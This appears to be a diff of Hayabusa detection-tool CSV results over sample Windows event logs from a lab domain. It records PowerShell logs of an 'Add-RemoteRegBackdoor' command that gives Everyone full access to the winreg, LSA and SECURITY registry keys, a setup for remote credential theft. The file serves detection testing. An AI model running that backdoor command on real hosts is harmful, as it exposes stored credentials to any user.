+2021-12-10 03:50:56.099 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:56.146 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:51:16.683 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9e8 | User: FS03$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 04:54:03.261 +09:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,Add-RemoteRegBackdoor -ComputerName FS03 -Trustee 'S-1-1-0',../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.261 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : ] Using trustee username 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.370 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-WmiObject): ""Get-WmiObject"" ParameterBinding(Get-WmiObject): name=""Class""; value=""Win32_Service"" ParameterBinding(Get-WmiObject): name=""Filter""; value=""name='RemoteRegistry'"" ParameterBinding(Get-WmiObject): name=""ComputerName""; value=""FS03""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.370 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03] Attaching to remote registry through StdRegProv""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.370 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-WmiObject): ""Get-WmiObject"" ParameterBinding(Get-WmiObject): name=""Namespace""; value=""root/default"" ParameterBinding(Get-WmiObject): name=""Class""; value=""Meta_Class"" ParameterBinding(Get-WmiObject): name=""Filter""; value=""__CLASS = 'StdRegProv'"" ParameterBinding(Get-WmiObject): name=""ComputerName""; value=""FS03""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.386 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring started for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.417 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.417 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.435 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating the trustee WMI object with user 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.435 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.435 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Applying Trustee to new Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.451 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Calling SetSecurityDescriptor on the key with the newly created Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.453 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring completed for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.453 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring started for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.453 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.453 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.468 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating the trustee WMI object with user 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.468 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.468 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Applying Trustee to new Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.468 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Calling SetSecurityDescriptor on the key with the newly created Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.486 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring completed for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.486 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring started for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.494 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.494 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.494 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating the trustee WMI object with user 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.494 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.503 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Applying Trustee to new Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.503 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Calling SetSecurityDescriptor on the key with the newly created Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.503 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring completed for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.503 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring started for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.519 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.519 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.519 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating the trustee WMI object with user 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.519 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.535 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Applying Trustee to new Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.540 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Calling SetSecurityDescriptor on the key with the newly created Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.540 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring completed for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.540 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring started for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.556 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.556 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.556 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating the trustee WMI object with user 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.556 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.556 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Applying Trustee to new Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.571 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Calling SetSecurityDescriptor on the key with the newly created Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.571 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring completed for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.571 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Backdooring started for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.571 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
